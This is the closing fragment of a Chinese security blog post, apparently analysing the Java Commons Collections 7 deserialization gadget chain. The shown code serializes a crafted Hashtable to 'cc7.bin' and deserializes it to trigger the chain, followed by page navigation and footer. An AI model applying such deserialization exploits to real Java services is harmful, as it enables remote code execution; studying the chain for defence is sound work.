class="hljs-keyword">new</span> ObjectOutputStream(<span class="hljs-keyword">new</span> FileOutputStream(<span class="hljs-string">&quot;./cc7.bin&quot;</span>));<br>            outputStream.writeObject(hashtable);<br>            outputStream.close();<br><br>            ObjectInputStream inputStream = <span class="hljs-keyword">new</span> ObjectInputStream(<span class="hljs-keyword">new</span> FileInputStream(<span class="hljs-string">&quot;./cc7.bin&quot;</span>));<br>            inputStream.readObject();<br>        &#125;<span class="hljs-keyword">catch</span>(Exception e)&#123;<br>            e.printStackTrace();<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>
    </div>
</div>
<style>
    #noneimg img {
        display: none;
        z-index: 109;
        width: 600px !important;
        border-radius: 0px;
        position: fixed;
        box-shadow: 0 0 0px #c3c3c300 !important;
        left: 0;
        top: 0;
        right: 0;
        bottom: 0;
        margin: auto !important;
    }

    @media screen and (max-width:600px) {
        #noneimg img {
            width: 88%
        }
    }
</style>
<script>
    $(function () { $('#article').click(function (e) { if (e.target.tagName == "IMG") { if ($('#nonediv').length == 0) { let MImg = `<div id='noneimg'><img src='${e.target.currentSrc}'></div>`; let MDiv = "<div id='nonediv' style='cursor: pointer;display: none; position: fixed;left: 0;top: 0; right: 0;bottom: 0;background-color: #333;opacity:0.5;z-index: 108;'></div>"; $('#article').append(MDiv); $('#article').append(MImg); $("#nonediv").fadeIn("slow"); $("#noneimg img").fadeIn("slow") } } else { if ($('#nonediv').length !== 0) { $("#noneimg ").fadeOut("slow"); $("#nonediv").fadeOut("slow"); setTimeout(function () { $('#nonediv').remove(); $('#noneimg').remove() }, 500) } } }); $('.article-content').addClass('content-move') });
</script>
<div class="Last-Next">
    
    <a href="/2022/03/11/Fastjson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90/">
        <div class="last">
            <span>上一篇</span>
            <p>Fastjson反序列化分析</p>
        </div>
    </a>
    

    
    <a href="/2022/03/06/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-Commons-Collections3%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90/">
        <div class="next">
            <span>下一篇</span>
            <p>Java反序列化-Commons Collections3利用链分析</p>
        </div>
    </a>
    
</div>
		
<link rel="stylesheet" href="/css/food.css">

<div class="footer">
	<div class="Copyright">
		©2022 By TRRQ. 主题：<a
			style="text-decoration: none;display: contents; color: #898F9F;"
			target="_blank" rel="noopener" href="https://github.com/qiaobug/hexo-theme-quiet">Quiet</a>
	</div>
	<div class="contact">
		
		<a target="_blank" rel="noopener" href="https://github.com/qiaobug">
			<img src="https://cdn.jsdelivr.net/gh/duogongneng/MyBlogImg/imggithub.png" alt="Quiet主题">
		</a>
		
	</div>
</div>

<script src="/js/jquery.min.js"></script>


<script src="/js/gotop.js"></script>


<style type="text/css">
    @media screen and (min-width: 600px) {
        .goTop>span {
            display: block;
            border-radius: 50%;
            width: 66px;
            height: 66px;
            cursor: pointer;
            opacity: 0.8;
            background: rgba(18, 24, 58, 0.06);
            text-align: center;
            border: 1px solid rgba(18, 24, 58, 0.06);

            transition: border .5s;
            -moz-transition: border .5s;
            /* Firefox 4 */
            -webkit-transition: border .5s;
            /* Safari 和 Chrome */
            -o-transition: border .5s;
            /* Opera */
        }

        .goTop>span:hover {
            border: 1px solid #6680B3;
        }


        .goTop {
            position: fixed;
            right: 30px;
            bottom: 80px;
        }

        .goTop>span>svg {
            width: 30px;
            height: 30px;
            margin-top: 17.5px;
            opacity: 0.7;
        }

    }

    @media screen and (max-width: 600px) {
        .goTop {
            display: none;
        }
    }
</style>
<div class="goTop" id="js-go_top">
    <span>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
            <g>
                <path d="M13 12v8h-2v-8H4l8-8 8 8z"></path>
            </g>
        </svg>
    </span>
</div>
<script>
    $('#js-go_top').gotoTop({ offset: 500, speed: 300, animationShow: { 'transform': 'translate(0,0)', 'transition': 'transform .5s ease-in-out' }, animationHide: { 'transform': 'translate(100px,0)', 'transition': 'transform .5s ease-in-out' } });
</script>
<script>
	console.log('\n %c Hexo-Quiet 主题 %c https://github.com/QiaoBug/hexo-theme-quiet \n', 'color: #fadfa3; background: #030307; padding:5px 0;', 'background: #fadfa3; padding:5px 0;')
</script>
	</body>

</html>